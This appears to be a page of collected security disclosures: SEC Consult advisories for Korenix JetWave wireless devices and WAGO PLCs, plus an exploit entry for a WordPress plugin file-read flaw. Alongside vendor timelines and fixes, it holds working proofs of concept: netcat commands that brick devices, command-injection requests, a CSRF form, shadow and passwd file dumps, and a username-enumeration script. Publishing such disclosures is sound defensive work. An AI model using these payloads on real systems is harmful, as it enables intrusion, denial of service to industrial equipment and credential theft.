pFhSdLOa8Q+4yu+/2LaPnBSElTbSXpgqA7aTyxrfl5yhLF/FKDI/zDhVMmSNuvAr cGBbNjfZflaeJmdFXMSU3a3makS3utMyiHl7BNrwjzHVjWpqvLdo9Jyb3vIpOKO3 3mH9yER0ML0lrHXrLZCbgHDXp8Vktuxh8eDE3R/A1YUOTK95sODwbU42skn0V4cf h9aNDpszjqbaniHOdnwLL8yof6Q8Ldn2Wxp8MkcTtdWBzNT6sD3D9AfsS0ikxddM JMIzsDM4+GTLxyZrv4jCloLk9g== =nECi -----END PGP PUBLIC KEY BLOCK----- UOB EMAIL DISCLAIMER Any person receiving this email and any attachment(s) contained, shall treat the information as confidential and not misuse, copy, disclose, distribute or retain the information in any way that amounts to a breach of confidentiality. If you are not the intended recipient, please delete all copies of this email from your computer system. As the integrity of this message cannot be guaranteed, neither UOB nor any entity in the UOB Group shall be responsible for the contents. Any opinion in this email may not necessarily represent the opinion of UOB or any entity in the UOB Group. </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220131-0 > ======================================================================= title: Multiple Critical Vulnerabilities product: Korenix Technology JetWave products: JetWave 2212X, JetWave 2212S, JetWave 2212G, JetWave 2311, JetWave 3220 vulnerable version: See "Vulnerable / tested versions" fixed version: See "Solution" CVE number: CVE-2020-12500, CVE-2020-12501, CVE-2020-12502, CVE-2020-12503, CVE-2020-12504, CVE-2021-39280 impact: Critical homepage: https://www.korenix.com/ found: 2020-04-06 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market- oriented, value-focused Industrial Wired and Wireless Networking Solutions. [...] Our products are mainly applied in SMART industries: Surveillance, Machine-to- Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners." Source: https://www.korenix.com/en/about/index.aspx?kind=3 Business recommendation: ------------------------ The vendor provides an updated firmware which should be installed immediately. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve potential further critical security issues. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated Device Administration (CVE-2020-12500) Korenix, Westermo (members of the Beijer Group) and Comtrol (Pepperl+Fuchs) are sharing a partially similar firmware base for the industrial devices. They can be managed via a Windows client program called "Korenix View" or "Jet View". This program communicates in plaintext via UDP. All messages that are sent to the device are broadcast in the whole subnet and the answers from the devices are sent back via broadcast too. The older version of this management program, called "cmd-server2", can be controlled without a password. Analyzing the newer version, called "jetviewd", indicates that some kind of password can be set. But this is not part of the default configuration. Actions that can be done via this daemon, listening on UDP port 5010, are: * Modifying networking settings (IP, netmask, gateway) * Initiating self tests and blink LEDs on the device * Triggering download and upload of configuration files (via TFTP) * Triggering uploads of new firmware and bootloader files (via TFTP) The device can also be bricked via this daemon so that it is necessary to press the reset button and re-configure the settings. 2) Cross-Site Request Forgery (CSRF) (CVE-2020-12502) The web interface, that is used to set all configurations, is vulnerable to cross-site request forgery attacks. An attacker can change settings via this way by luring the victim to a malicious website. 3) Multiple Authenticated Command Injections (CVE-2020-12503) Multiple command injection vulnerabilities were found on the device series "JetWave". They are partially sharing the same firmware base. Therefore, the payloads to exploit those command injections are similar. Due to the lack of CSRF protection, an attacker can execute arbitrary commands on the device by luring the victim to click on a malicious link. 4) Hidden OS Web-Shell Interface (CVE-2021-39280) The endpoint /syscmd.asp in the web interface of the devices contains an undocumented web-shell that can be used to invoke system-commands as root after authentication. It seems that this is part of the used SDK and a leftover artifact. In combination with the missing CSRF protection, this vulnerability poses a higher risk. 5) Arbitrary Unauthenticated TFTP Actions (CVE-2020-12504) A TFTP service is present on a broad range of devices for firmware-, bootloader-, and configuration-uploads/downloads. This TFTP server can be abused to read all files from the system as the daemon runs as root which results in a password hash exposure via the file /etc/passwd. Write access is restricted to certain files (configuration, certificates, boot loader, firmware upgrade) though. By uploading malicious Quagga config-files an attacker can modify e.g. IP settings of the device. Malicious firmware and bootloader uploads are possible too. Proof of concept: ----------------- 1) Unauthenticated Device Administration (CVE-2020-12500) All commands can be sent via UDP port 5010. Device discovery (firmware/bootloader version etc. in response): echo -e "\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x01" | nc -u $IP 5010 Blink with leds: echo -e "\x00\x00\x00\x5b\x00\x00\x00\x01\x01" | nc -u $IP 5010 Permanent denial of service. The device is only available after pressing the reset button to load the default config: echo -e "\x00\x00\x00\x1f\x01\x01\x01\x04\x01\x01\x01\x01" | nc -u $IP 5010 Present on: * Korenix JetWave (Multiple devices) 2) Cross-Site Request Forgery (CSRF) (CVE-2020-12502) The following CSRF PoC can be used to ping 127.0.0.1. All other actions in the context of the menu, like uploading config files, can be done in the same way: ------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://$IP/goform/formping" method="POST"> <input type="hidden" name="PingIPAddress" value="127.0.0.1" /> <input type="hidden" name="submit-url" value="/toolping.asp" /> <input type="hidden" name="Submit" value="Ping" /> <input type="submit" value="Submit request" /> </form> </body> </html> ------------------------------------------------------------------------------- 3) Multiple Authenticated Command Injections (CVE-2020-12503) At least two command injections are present in the default web interface. It is likely that more such vulnerabilities are present on the device. 3.1) Semi-Blind Command Injection The following command injection works on the devices: * Korenix JetWave (Multiple devices) The ping functionality in the web interface can be abused to inject system commands in a semi-blind way. Two requests must be sent to the service to retrieve the output of the command injection. The first request is a POST request to the endpoint /goform/formping: ------------------------------------------------------------------------------- POST /goform/formping HTTP/1.1 Host: $IP Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 57 Connection: close Cookie: -common-web-session-=::webs.session::9c10b4b1b22063e7fcba5369ff86e779 Upgrade-Insecure-Requests: 1 PingIPAddress=;id;&submit-url=%2Ftoolping.asp&Submit=Ping ------------------------------------------------------------------------------- This request triggers the actual command injection in a blind way. The output can be fetched from the system by using the following GET request after triggering the previous POST request: ------------------------------------------------------------------------------- GET //toolping.asp HTTP/1.1 Host: $IP Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: -common-web-session-=::webs.session::9c10b4b1b22063e7fcba5369ff86e779 Upgrade-Insecure-Requests: 1 ------------------------------------------------------------------------------- 3.2) Blind Command Injection The following command injection works on the devices: * Korenix JetWave (Multiple devices) The configuration upload via TFTP in the web interface can be abused to inject system commands in a blind way. The request is a POST request to the endpoint /goform/formTFTPLoadSave: ------------------------------------------------------------------------------- POST /goform/formTFTPLoadSave HTTP/1.1 Host: $IP Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 121 Connection: close Cookie: ui_language=en_US; -common-web-session-=::webs.session::f6070212ccae758d7d247fb8e2c52cd7 Upgrade-Insecure-Requests: 1 submit-url=%2Fmgmtsaveconf.asp&ip_address=127.0.0.1;ping 192.168.1.1;&file_name=ap.conf&tftp_action=load&tftp_config=Submit ------------------------------------------------------------------------------- 4) Hidden OS Web-Shell Interface (CVE-2021-39280) The endpoint /syscmd.asp can be accessed after successful login. It can be used to execute system commands directly as root. Present on: * Korenix JetWave 2212X * Korenix JetWave 2212S * Korenix JetWave 2212G * Korenix JetWave 2311 * Korenix JetWave 3220 * Korenix JetWave 3420 5) Arbitrary TFTP Actions (CVE-2020-12504) The Linux TFTP client was used to download files from the system using absolute paths. Uploads were only possible on existing paths like: /home/Quagga.conf /home/bootloader.bin To download the /etc/passwd file from the system, the following command was invoked: [user@localhost ~]$ tftp -m binary <Target-IP> -c get /etc/shadow [user@localhost ~]$ cat shadow root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7::: Present on: * Korenix JetWave (Multiple devices) The vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an emulated device by using the MEDUSA scalable firmware runtime. Vulnerable / tested versions: ----------------------------- The following firmware versions have been identified to be vulnerable: * Korenix JetWave 2212X / 1.5 * Korenix JetWave 2212S / 1.5 * Korenix JetWave 2212G / 1.4 * Korenix JetWave 3220 / 1.2 * Korenix JetWave 3420 / 1.1.3T * Korenix JetWave 2311 / 1.2 is EOL now Vendor contact timeline: ------------------------ 2020-04-14: Contacting CERT@VDE through info@cert.vde.com and requested support for the disclosure process due to the involvement of multiple vendors. 2020-04-15: Security contact responded, that the products were developed by Korenix Technologies. 2020-04-30: Security contact informed us, that some vulnerabilities were confirmed by the vendor. 2020-07-30: Call with Pepperl+Fuchs contact. Contact stated that the vulnerabilities were reported to Korenix. 2020-09-29: Call with Pepperl+Fuchs and CERT@VDE regarding status. Pepperl+Fuchs stated that they just have a sales contact from Korenix. 2020-10-05: Coordinated release of SA-20201005-0. 2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated that no case regarding vulnerabilities were opened and created one. The product owners of Westermo, Korenix and Beijer Electronics were informed via this inquiry. Set disclosure date to 2020-11-25. 2020-10-06: Restarted the whole responsible disclosure process by sending a request to the new security contact cs@beijerelectronics.com. 2020-10-07: Received an email from a Korenix representative which offered to answer questions about product security. Started responsible disclosure by requesting email certificate or whether plaintext can be used. Referred to the request to cs@beijerelecrtronics.com. No answer. 2020-11-11: Asked the representatives of Korenix and Beijer regarding the status. No answer. 2020-11-25: Phone call with security manager of Beijer. Sent advisories via encrypted archive to cs@beijerelectronics.com. Received confirmation of advisory receipt. Security manager told us that he can provide information regarding the time-line for the patches within the next two weeks. 2020-12-09: Asked for an update. 2020-12-18: Call with security manager of Beijer. Vendor presented initial analysis done by the affected companies. 2021-03-21: Security manager invited SEC Consult to have a status meeting. 2021-03-26: Agreed on an advisory split as other affected products will get patched later. 2021-04-12: Performed advisory split. 2021-05-26: Meeting regarding advisory publication. Agreed to release this advisory in Q4. 2021-06-01: Released related advisory SA-20210601-0. 2021-07-05: Follow-up meeting with vendor regarding next steps. 2021-07-16: Contact from Beijer Electronics reached out to Korenix. Engineers from Korenix are still investigating the issues. JetWave 2311 went EoL, next status update in August. JetPort will be fixed in Q1 2022. 2021-09-15: Asked for status update; 2021-09-20: Korenix will provide a time schedule for the patches by end of next week. 2021-09-28: Meeting regarding the schedule. Fixes will be available by end of the year for Korenix JetWave series. 2021-09-28: Update call with vendor; Fixes will be available in November. 2021-11-18: Contact had difficulties to get a response from Korenix. JetWave 2212G 1.8.0 has been released, other fixes will be released in December. 2021-11-22: Vendor provides all other fixed versions, which have already been put online. 2021-12-17: Performed another advisory split. 2021-12-20: Update call with vendor. Identified another possibly affected device (JetWave 3420). Investigation will be started from Korenix as soon as possible. 2021-12-28: Vendor has rolled out an update for the JetWave 3420 V3 firmware. 2022-01-17: Informed vendor about the advisory release within the next two weeks. 2022-01-19: Call with vendor; agreed that advisory can be published for JetWave series. 2022-01-24: Informed vendor about advisory release on 2022-01-31. 2022-01-31: Coordinated release of advisory. Solution: --------- The following firmware updates are being provided by the vendor: * Korenix JetWave 2212X / 1.9.1 * Korenix JetWave 2212S / 1.9.1 * Korenix JetWave 2212G / 1.8 * Korenix JetWave 3220 V3 / 1.5.1 * Korenix JetWave 3420 V3 / 1.5.1 * Korenix JetWave 2311 / is EOL now The firmware can be downloaded from the vendor's support page: https://www.korenix.com/en/support/index.aspx Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Thomas Weber / @2022 </code></pre>

<pre><code># Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated) # Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/ # Date: 2/12/2021 # Exploit Author: Uriel Yochpaz # Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/ # Software Link: # Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45 # Tested on: Linux (DZS Zoomsounds version 5.82) # CVE : CVE-2021-39316 The vulnerability allows a remote attacker to perform directory traversal attacks. The vulnerability exists due to input validation error when processing directory traversal sequences in the "link" parameter in the "dzsap_download" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system. Mitigation: Install update from vendor's website. Vulnerable software versions ZoomSounds: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45 PoC: user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd" root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false user:x:1000:1000:user,,,:/home/user:/bin/bash mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220126-0 > ======================================================================= title: Denial of service & User Enumeration product: WAGO 750-8xxx PLC vulnerable version: < Firmware 20 Patch 1 (v03.08.08) fixed version: Firmware 20 Patch 1 (v03.08.08) CVE number: CVE-2021-34593 impact: Medium homepage: https://www.wago.com/ found: 2021-05-05 by: SEC Consult Vulnerability Lab These vulnerabilities were discovered during the research cooperation initiative "OT Cyber Security Lab" between Verbund AG and SEC Consult Group. Gerhard Hechenberger (Office Vienna) Steffen Robertz (Office Vienna) An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Optimum performance and availability: Thanks to their ultra-high performance, low power consumption, numerous interfaces, space-saving design and high reliability, WAGO’s user-friendly controllers (PLCs) are cost-effective automation solutions. For optimal automation both inside and outside the control cabinet: the flexible IP20 remote I/O systems for all applications and environments." Source: https://www.wago.com/us/c/controllers-bus-couplers-i-o Business recommendation: ------------------------ WAGO's customers should upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further security issues. Vulnerability overview/description: ----------------------------------- 1) Denial of Service (Codesys) (CVE-2021-34593) The "plclinux_rt" binary is listening on port 2455. It handles communication with the CODESYS suite. By sending requests that define an invalid packet size, a malloc error can be triggered. This leads to a denial of service of the remote connectivity of the codesys service. This was also reported to and released together with CODESYS, find the corresponding advisories here: https://sec-consult.com/vulnerability-lab/advisory/codesys-v2-denial-of-service/ https://customers.codesys.com/index.php?eID=dumpFile&t=f&f=16877&token=8faab0fc1e069f4edfca5d5aba8146139f67a175 2) Enumeration of Users Due to a time-based side channel vulnerability, it can be derived which usernames are valid. This eases the process of brute-forcing valid credentials. 3) Outdated Software with Known Vulnerabilities The PLC is using multiple outdated software components with known exploits. 4) Insufficient Hardening of Binaries Multiple binaries are not compiled with available security features. This will ease further attacks once a memory corruption vulnerability has been spotted. Proof of concept: ----------------- 1) Denial of Service (Codesys) (CVE-2021-34593) Codesys packet headers are structured like below (pseudo code): struct codesys_header { uint16_t magic, int32_t packet_size } The magic bytes will be 0xbbbb. By defining a packet size of 0xffffffff, a size of 4 GB is defined. The following pseudo code will be used to handle the request: allocated_mem = (byte*)SysAllocDataMemory(coedesys_header.packet_size); buffer_info->recv_buf_wout_header = allocated_mem; if (allocated_mem == (byte *)0x0) { return; } As 4GB of memory aren't available, malloc will return a NULL pointer, which is passed back through the SysAllocDataMemory() function and the return statement in the pseudo code will be hit. Thus, the TCPServerTask() function will return. The file descriptor for the client is not cleared in advance. Therefore, the socket stays open indefinitely. A new client will open the next file descriptor. As only 19 clients are allowed to be connected simultaneously, it is sufficient to send 19 requests with a wrong packet length to force the PLC into a state where it will refuse further connections to the Codesys service. The current implementation is missing the call to SysSockClose() once a buffer allocation fails. 2) Enumeration of Users A time-based side channel vulnerability in the webserver's authentication method is leaking information about valid usernames. The following code snippet is used in the login method: // get password file and iterate over every line $pwFileArray = file($passwordFilename); foreach($pwFileArray as $lineNo => $pwFileLine) { // extract username and user password $passwordFileData = explode(':', trim($pwFileLine)); // if username was found in line, verify given password with user password if(isset($passwordFileData[0]) && ($passwordFileData[0] === $username)) { $pwCorrect = password_verify($password, $passwordFileData[1]); break; } } The password hash is only calculated if the username is found to be valid. As the PLC has limited computational power, this results in different timings for the response depending on the validity of the username. The following script can be used to find valid users. The parameter 'delay_valid' might need to be adjusted to the network speed: ---------------------------- #!/usr/sbin/python import requests import sys import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) delay_valid = 0.2 f = open(sys.argv[1],"r"); for user in f.readlines(): payload = {"username":user.replace('\n',''),"password":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} cnt = 0 for i in range(5): try: r = requests.post("https://<your_PLC_IP>/wbm/php/authentication/login.php", json=payload, timeout=delay_valid, verify=False) except: cnt = cnt +1 if cnt >=3: print("[*]Valid User: {}".format(user)) ----------------------------- 3) Outdated Software with Known Vulnerabilities Following outdated and vulnerable components were identified by using the IoT Inspector firmware analysis tool: - Dsnmasq 2.80: 9 CVEs - Bash 4.4.23: 1 CVE - GNU glibc 2.30: 12 CVEs - Linux Kernel 4.9.146: 663 CVEs - OpenSSL 1.0.1: 103 CVEs - BusyBox 1.30.1: 2 CVEs - Curl 7.72.0: 1 CVE - OpenSSH 7.9p1: 4 CVEs - PHP 7.3.15: 11 CVEs - Wpa_supplicant 2.6: 20 CVEs - NET-SNMP 5.8: 1 CVE - Libpcap 1.8.1: 5 CVEs - Info-ZIP 3.0: 13 CVEs 4) Insufficient Hardening of Binaries The following features were extracted with the IoT Inspector: - 1.9% of all executables support full RELRO - 84.6% support partial RELRO - Only 3.6% of all executables make use of stack canaries - 58.9% are using ASLR/PIE The plclinux_rt binary is an example of a particularly vulnerable binary. It accepts user input on port 2455 and is missing all compile-time security features. Thus, it's a perfect candidate to successfully exploit any identified buffer overflow. Vulnerable / tested versions: ----------------------------- The following versions have been tested and found to be vulnerable: * WAGO 750-8xxx Firmware 18 (v03.06.11) * WAGO 750-8xxx Firmware 15 (v03.03.10) Vendor contact timeline: ------------------------ 2021-05-25: Contacting vendor through support.at@wago.com, asking for security contact information. Support informed about their PSIRT team. Set preliminary release date to 2021-07-14. 2021-05-26: Contacting PSIRT through psirt@wago.com for encryption options. 2021-05-27: Received PGP key from PSIRT, transmitted encrypted advisory to psirt@wago.com. 2021-05-31: Wago PSIRT notifies about decryption problems. 2021-06-02: Wago PSIRT redirects to VDE CERT for encrypted transmission. Transmitted encrypted advisory to info@cert.vde.com. Set release date to 2021-07-22. Wago PSIRT resolves decryption problems. 2021-06-07: Received confirmation from VDE CERT. 2021-08-11: On request, Wago PSIRT informs about the investigation results and mentions that the DoS was already reported and is fixed with firmware 18 patch 3. 2021-08-18: A check on the most recent public firmware release v18 (v03.06.19) shows that the vulnerability still exists. Wago PSIRT is notified. 2021-09-01: Wago PSIRT confirms and ensures the issue is investigated. 2021-09-29: Request status from Wago PSIRT. Set new release date to 2021-11-16. 2021-09-30: Wago PSIRT states that CODESYS provided a fix which is currently tested and to wait for a coordinated release with CODESYS. 2021-10-15: CODESYS informs about the assigned CVE-2021-34593 and the planned publishing date. 2021-10-18: Requesting information from Wago on an updated firmware version. 2021-10-19: Wago PSIRT states that they just received the new CODESYS sources and it will take some more weeks to create a new firmware release. 2021-10-28: CODESYS vulnerability CVE-2021-34593 is released in a coordinated manner together with CODESYS group without exploit details. 2021-11-30: Request status from Wago PSIRT on new firmware release. 2022-01-17: Request status from Wago PSIRT on new firmware release again. 2022-01-18: Wago PSIRT informs that firmware 20 Patch 1 released on January 10, 2022 fixes the remaining issue. The firmware was not yet published on their website. 2022-01-26: Release of security advisory. Solution: --------- Immediately update the PLCs to the fixed firmware version provided by the vendor to mitigate CVE-2021-34593. The fixed firmware release 20 patch 1 can be obtained from https://www.wago.com/de/d/6599873 Regarding vulnerability 2) As stated by Wago, there are only two possible default usernames. Therefore, the username enumeration may not gain additional information and this will not be changed. Additionally, due to varying release cycles, there is a delay in updating components (affecting the other identified vulnerabilities). It is planned to change to a new distribution release with firmware 20. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Gerhard Hechenberger, Steffen Robertz / @2022 </code></pre>